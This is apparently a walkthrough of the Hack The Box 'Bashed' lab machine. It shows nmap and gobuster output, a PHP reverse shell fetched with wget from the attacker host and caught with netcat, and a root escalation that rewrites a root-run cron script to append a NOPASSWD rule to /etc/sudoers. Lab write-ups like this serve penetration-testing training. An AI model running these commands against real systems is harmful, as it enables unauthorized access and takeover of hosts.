Bashed
This machine features a web application running a php web shell. This is a relatively simple machine w
Recon
Lets run the nmap scan. The ping probes are blocked so we will have to use the -Pn flag for the nmap scan.
1nmap -sS -sV -sC -T4 10.10.10.68
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 10:10 EST
3Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
4Nmap done: 1 IP address (0 hosts up) scanned in 2.31 seconds
5root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# ping 10.10.10.68
6PING 10.10.10.68 (10.10.10.68) 56(84) bytes of data.
764 bytes from 10.10.10.68: icmp_seq=1 ttl=63 time=12.4 ms
864 bytes from 10.10.10.68: icmp_seq=2 ttl=63 time=15.1 ms
964 bytes from 10.10.10.68: icmp_seq=3 ttl=63 time=13.7 ms
10^C
11--- 10.10.10.68 ping statistics ---
123 packets transmitted, 3 received, 0% packet loss, time 2004ms
13rtt min/avg/max/mdev = 12.367/13.722/15.129/1.128 ms
14root@kinetic:/oscp/LABs/zerotrust/content/lab/hackthebox/lame/data# nmap -sS -sV -sC -T4 10.10.10.68
15Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-12 10:12 EST
16Nmap scan report for 10.10.10.68
17Host is up (0.016s latency).
18Not shown: 999 closed ports
19PORT STATE SERVICE VERSION
2080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
21|_http-server-header: Apache/2.4.18 (Ubuntu)
22|_http-title: Arrexel's Development Site
23
24Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
25Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
26
Notes:
- Web server is running Apache httpd 2.4.18, which means we are likely dealing with a linux machine
- No other port is open so our only way in is going to be through web exploit.
Enumeration
Since there is a webserver running, lets enumerate the directories.
1# gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt
2===============================================================
3Gobuster v3.0.1
4by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5===============================================================
6[+] Url: http://10.10.10.68
7[+] Threads: 10
8[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
9[+] Status codes: 200,204,301,302,307,401,403
10[+] User Agent: gobuster/3.0.1
11[+] Extensions: php,txt
12[+] Timeout: 10s
13===============================================================
142020/12/12 10:16:06 Starting gobuster
15===============================================================
16/images (Status: 301)
17/uploads (Status: 301)
18/php (Status: 301)
19/css (Status: 301)
20/dev (Status: 301)
21/js (Status: 301)
22/config.php (Status: 200)
23/fonts (Status: 301)
24/server-status (Status: 403)
25===============================================================
262020/12/12 10:32:04 Finished
27===============================================================
Notes:
- Two directories stand out - uploads and dev
- Fire up the browser on your machine and go to uploads as well as dev
Web enumeration:
- The uploads directory does not give us anything
- The dev directory has a web shell running and we can fire up commands as www-data
- The uploads directory is writable for www-data, so we can upload a php reverse shell there
Exploit
On the webshell, lets upload a php reverse shell script so we can get a regular shell back -
1www-data@bashed
2:/var/www/html# cd uploads
3
4www-data@bashed
5:/var/www/html/uploads# ls
6
7index.html
8www-data@bashed
9:/var/www/html/uploads# wget http://10.10.14.25:8000/shell.php
10
11--2020-12-12 15:48:48-- http://10.10.14.25:8000/shell.php
12Connecting to 10.10.14.25:8000... connected.
13HTTP request sent, awaiting response... 200 OK
14Length: 5493 (5.4K) [application/octet-stream]
15Saving to: 'shell.php'
16
170K ..... 100% 1.27M=0.004s
18
192020-12-12 15:48:48 (1.27 MB/s) - 'shell.php' saved [5493/5493]
Now, Start your local listener and visit http://10.10.10.68/uploads/shell.php , you will get the shell!
1eneloop@kinetic:/dev/shm$ nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.10.14.25] from (UNKNOWN) [10.10.10.68] 59136
4Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
5 15:50:16 up 5 min, 0 users, load average: 0.00, 0.07, 0.05
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=33(www-data) gid=33(www-data) groups=33(www-data)
8/bin/sh: 0: can't access tty; job control turned off
9$ python -c 'import pty;pty.spawn("/bin/bash");'
10www-data@bashed:/$ ls -l
11ls -l
12total 80
13
Post-exploit/Privesc
Now, you can use the similar technique as above to upload linpeas or other local enumeration scripts to gather more information so we can try to do a lateral or vertical priv escalation
Here are some important things you will notice from the server -
1[+] All users
2 root:x:0:0:root:/root:/bin/bash
3 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4 bin:x:2:2:bin:/bin:/usr/sbin/nologin
5 sys:x:3:3:sys:/dev:/usr/sbin/nologin
6 sync:x:4:65534:sync:/bin:/bin/sync
7 games:x:5:60:games:/usr/games:/usr/sbin/nologin
8 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20 systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
21 systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
22 systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
23 systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
24 syslog:x:104:108::/home/syslog:/bin/false
25 _apt:x:105:65534::/nonexistent:/bin/false
26 messagebus:x:106:110::/var/run/dbus:/bin/false
27 uuidd:x:107:111::/run/uuidd:/bin/false
28 arrexel:x:1000:1000:arrexel,,,:/home/arrexel:/bin/bash
29 scriptmanager:x:1001:1001:,,,:/home/scriptmanager:/bin/bash
30
31
32[+] Kernel
33 Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017
34[+] Hostname
35 bashed
36[+] Operating System
37 Ubuntu 16.04.2 LTS \n \l
38
39
40User www-data may run the following commands on bashed:
41 (scriptmanager : scriptmanager) NOPASSWD: ALL
42
43[+] All users & groups
44uid=0(root) gid=0(root) groups=0(root)
45uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
46uid=10(uucp) gid=10(uucp) groups=10(uucp)
47uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
48uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
49
50
51/var/lib/php/sessions
52
53[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
54[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
55-rw-r--r-- 1 root root 2188 Aug 31 2015 /etc/bash.bashrc
56-rw-r--r-- 1 root root 3771 Aug 31 2015 /etc/skel/.bashrc
57-rw-r--r-- 1 root root 655 Jun 24 2016 /etc/skel/.profile
58-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 /home/arrexel/.bashrc
59-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 /home/arrexel/.profile
60-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 /home/arrexel/.sudo_as_admin_successful
61-rw-r--r-- 1 scriptmanager scriptmanager 3786 Dec 4 2017 /home/scriptmanager/.bashrc
62-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
63-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
64-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
65-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
66-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
67-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
68
69[+] .sh files in path
70[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
71/usr/bin/gettext.sh
72
73[+] Unexpected folders in root
74/scripts
75/lost+found
76
77
78Files with capabilities:
79/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
80/usr/bin/mtr = cap_net_raw+ep
81/usr/bin/traceroute6.iputils = cap_net_raw+ep
Notes:
- Here we can make a very interesting finding that we can run any command as scriptmanager user!
- Also, there is a /scripts directory owned by scriptmanager in the root which is very unusal. Let’s explore further.
1www-data@bashed:/home/scriptmanager$ ls -l /scripts/
2ls -l /scripts/
3ls: cannot access '/scripts/test.py': Permission denied
4ls: cannot access '/scripts/test.txt': Permission denied
5total 0
6-????????? ? ? ? ? ? test.py
7-????????? ? ? ? ? ? test.txt
8www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager 'date'
9sudo -u scriptmanager 'date'
10Sat Dec 12 16:28:11 PST 2020
Since we can run any command as scriptmanager, and scriptmanager being a regular user, we can exploit that to get shell as scriptmanager -
1www-data@bashed:/home/scriptmanager$ sudo -u scriptmanager bash -i
2sudo -u scriptmanager bash -i
Now, lets checkout those test.py and test.txt scripts we noticed earlier -
1scriptmanager@bashed:~$ cd /scripts
2cd /scripts
3scriptmanager@bashed:/scripts$ ls -l
4ls -l
5total 8
6-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
7-rw-r--r-- 1 root root 12 Dec 12 16:28 test.txt
8scriptmanager@bashed:/scripts$ cat test.py
9cat test.py
10f = open("test.txt", "w")
11f.write("testing 123!")
12f.close
13scriptmanager@bashed:/scripts$ date
14date
15Sat Dec 12 16:29:04 PST 2020
16scriptmanager@bashed:/scripts$ ls -l
17ls -l
18total 8
19-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
20-rw-r--r-- 1 root root 12 Dec 12 16:29 test.txt
21scriptmanager@bashed:/scripts$
22
Notes:
- As you can see, the test.txt is being updated every minute and is owned by root
- test.py script writes this file and most likely being run as root! this can be a juicy target!
We can manipulate the test.py script to add our user to sudoers
1cat test.py
2f = open("/etc/sudoers", "a")
3f.write("scriptmanager ALL=(ALL) NOPASSWD: ALL")
4f.close
Note:
- Note the “NOPASSWD” which means we can sudo without knowling the password for scriptmanager or any other user!
Now, overwrite the script and wait for a minute for the script to run. After this, you can simply sudo su - to become root as below -
1scriptmanager@bashed:/scripts$ echo 'f = open("/etc/sudoers", "a")
2f.write("scriptmanager ALL=(ALL) NOPASSWD: ALL")
3f.closeecho 'f = open("/etc/sudoers", "a")
4> f.write("scriptmanager ALL=(ALL) NOPASSWD: ALL")
5> '>test.py
6f.close'>test.py
7scriptmanager@bashed:/scripts$ date
8date
9Sat Dec 12 16:56:36 PST 2020
10scriptmanager@bashed:/scripts$ ls -ltr
11ls -ltr
12total 12
13-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 12 16:32 test.py-orig
14-rw-r--r-- 1 root root 565 Dec 12 16:36 test.txt
15-rw-r--r-- 1 scriptmanager scriptmanager 87 Dec 12 16:56 test.py
16scriptmanager@bashed:/scripts$ date
17date
18Sat Dec 12 16:56:47 PST 2020
19scriptmanager@bashed:/scripts$ date
20date
21Sat Dec 12 16:56:51 PST 2020
22scriptmanager@bashed:/scripts$ date
23date
24Sat Dec 12 16:57:03 PST 2020
25scriptmanager@bashed:/scripts$ sudo su -
26sudo su -
27root@bashed:~# ls
28ls
29root.txt
30root@bashed:~# cat root.txt
31cat root.txt
32<Flag goes here>
33
Additonal Note: After watching ippsec’s video once I was done, I realized that I could have simply copied the python reverse shell script over the test.py and that could get me a shell as well.